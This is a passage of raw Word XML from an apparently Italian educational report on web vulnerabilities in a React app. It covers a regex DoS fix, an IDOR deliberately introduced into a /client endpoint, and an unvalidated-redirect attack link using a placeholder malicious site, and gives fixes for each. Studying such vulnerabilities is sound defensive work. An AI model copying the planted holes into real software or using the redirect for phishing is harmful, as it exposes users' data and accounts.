        <w:t>Si blocca e va in errore generando un DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C9ECF" w14:textId="511AEE7B" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>SignUp.jsx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49376040" w14:textId="5C594A2D" w:rsidR="00C87C03" w:rsidRPr="00A74318" w:rsidRDefault="00C87C03" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22278544" w14:textId="687F9276" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18E93E91" wp14:editId="0122AB36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>17145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5478780" cy="726468"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="107087803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8780" cy="726468"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D6B7D" w14:textId="48957BF1" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12010828" w14:textId="56D581AE" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="632AD650" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="160F03FC" w14:textId="4EF68A77" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A093B3" wp14:editId="5159D299">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-567055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7215628" cy="3062316"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="32958178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15628" cy="3062316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFE11B" w14:textId="6F6244BF" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0EB317E1" w14:textId="06660706" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49AE4630" w14:textId="622E7B40" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28F7654B" w14:textId="24D8B90E" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F439A19" w14:textId="0795BB6E" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5153D3FE" w14:textId="1EE66C63" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36AD0E28" w14:textId="18AEC40B" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="10EA5188" w14:textId="77777777" w:rsidR="00C87C03" w:rsidRDefault="00C87C03" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4C7BF25A" w14:textId="4673B863" w:rsidR="00D03FA6" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t>abbiamo sostituito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la evil regex con un normale controllo sulla password</w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t xml:space="preserve">, usando il metodo includes() di JavaScript. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080AB12" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="22F15C86" w14:textId="7D6CA828" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="317B147C" wp14:editId="359A66B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>54610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5560695" cy="1483727"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="65596761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60695" cy="1483727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D66BAC" w14:textId="1C64942E" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FE52DC3" w14:textId="2C676D41" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="351AF7D1" w14:textId="421CF793" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BA50017" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79A790D2" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="121AFFC4" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E4D74B7" w14:textId="180EDC39" w:rsidR="00BC247B" w:rsidRDefault="00BC247B" w:rsidP="00BC247B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nsecure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">irect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">bject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eferences (IDOR)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C796C9" w14:textId="1814A638" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa vulnerabilità nasce quando l’utente può accedere o modificare gli oggetti manipolando l’id, supponendo che il database salvi gli oggetti utilizzando id sequenziali. Questo attacco si verifica a causa della mancanza di controlli </w:t>
      </w:r>
      <w:r w:rsidR="00BE15A3">
        <w:t>sugli accessi di un utente al fine di accedere o modificare gli oggetti in questione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E4A06" w14:textId="170166C5" w:rsidR="00BC247B" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> è stato modificato il metodo /client che prima cercava per username e ora cerca per id in modo tale che modificando l’ID con il successivo posso ottenere i dati di un altro utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DADFC0" w14:textId="1E17C283" w:rsidR="005E7293" w:rsidRPr="00BC247B" w:rsidRDefault="00BC247B" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8E9DF" w14:textId="18147C20" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3DD26C10" w14:textId="54500E7C" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66FAD8A8" wp14:editId="779AD8DF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-418465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4960620" cy="344932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0620" cy="3449320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69C26D" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0DB98471" w14:textId="1B34D159" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4F7BBE6E" w14:textId="3F3ABFC0" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="580FF46A" w14:textId="310F7FC1" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="32E02831" w14:textId="23E6E598" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35C4B738" w14:textId="1B32A32F" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="14D8CE63" w14:textId="4AC4EA7C" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2BE3B6CB" w14:textId="2A85984D" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3EEBB516" w14:textId="53E4879B" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49156F43" w14:textId="5E09BEAD" w:rsidR="005E7293" w:rsidRDefault="00C87C03" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13C64539" wp14:editId="36E4EACF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7057390" cy="1003300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6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57390" cy="1003300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B2CBA" w14:textId="2061ABD5" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1AB186CD" w14:textId="3A08ED7D" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D0C3B38" w14:textId="34F58349" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4992377C" w14:textId="2E39B94B" w:rsidR="005E7293" w:rsidRDefault="00C87C03" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A9A2F16" wp14:editId="32025071">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-540385</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>94615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7195836" cy="1658268"/>
            <wp:effectExtent l="0" t="0" r="508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195836" cy="1658268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3750A" w14:textId="6574003B" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73E53840" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4AF4AA95" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="00377ACC" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C48B657" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6197C124" w14:textId="41967704" w:rsidR="005E7293" w:rsidRDefault="006C2D8D" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: si può usare la versione originale dove la </w:t>
      </w:r>
      <w:r w:rsidR="00350E38">
        <w:t>GET viene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fatta per username e non per id. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF9DCA" w14:textId="08C2A738" w:rsidR="005E7293" w:rsidRDefault="00350E38" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C1DCCE6" wp14:editId="6985B91F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4057015" cy="2867243"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="9620038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57015" cy="2867243"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BC6DC" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="45133DFF" w14:textId="644E1394" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="021C06EC" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6FB3B579" w14:textId="3F55B623" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BA4859D" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2A7A3A0C" w14:textId="11993C6A" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="720CFBDC" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1FE5C372" w14:textId="24E4A14E" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02FEBF17" wp14:editId="2539B253">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-481965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6856296" cy="2051884"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="19492329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6296" cy="2051884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66DB7F" w14:textId="163F821B" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28E73157" w14:textId="5FEBE42F" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="25B0852F" w14:textId="5D557B01" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="084D97BB" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="78B3699C" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="329D2FDB" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73212B9D" w14:textId="49C3AFA5" w:rsidR="00FF363E" w:rsidRDefault="005F7CDE" w:rsidP="00FF363E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unvalidated redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54680F06" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRPr="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4F7A44" w14:textId="13271EAB" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>È un attacco possibile quando un’applicazione web accetta input non validati che possono far si che l’applicazione venga reindirizzata a questi indirizzi potenzialmente dannosi. Questa vulnerabilità apre ad attacchi di tipo phishing e/o si possono creare URL in cui si può evadere il controllo agli accessi ed accedere a porzioni privilegiate del file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40709DC0" w14:textId="3B60A990" w:rsidR="005333DB" w:rsidRDefault="00FF363E" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio l</w:t>
      </w:r>
      <w:r w:rsidR="005F7CDE">
        <w:t>’attacco consiste nell’inviare un url in cui l’utente viene indirizzato a una pagina di login dove si può specificare tramite il parametro back l’url a cui ritornare dopo aver fatto il login. Se l’url non è validato, si può sostituire con uno malevolo. Il link da inviare</w:t>
      </w:r>
      <w:r w:rsidR="005333DB">
        <w:t xml:space="preserve"> a un utente per fare l’attacco</w:t>
      </w:r>
      <w:r w:rsidR="005F7CDE">
        <w:t xml:space="preserve">è il seguente: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CC703" w14:textId="77777777" w:rsidR="005333DB" w:rsidRDefault="005333DB" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F9775B" w14:textId="0655D8DA" w:rsidR="00FF363E" w:rsidRDefault="005F7CDE" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="005F7CDE">
        <w:t>http://localhost:4200/login?back=sito malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33315ECC" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE8A3F6" w14:textId="664CCA70" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>ProtectedRoutesUser</w:t>
      </w:r>
      <w:r w:rsidR="00335218">
        <w:t>.jsx</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A817920" w14:textId="37E8C4C0" w:rsidR="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="708B5559" wp14:editId="34AAC7C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>876935</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>121920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4366260" cy="2302510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="219896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6260" cy="2302510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5152AF" w14:textId="701A3178" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F6DAF9" w14:textId="073A6DDD" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013C168E" w14:textId="4A654228" w:rsidR="00D03FA6" w:rsidRPr="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A9907" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
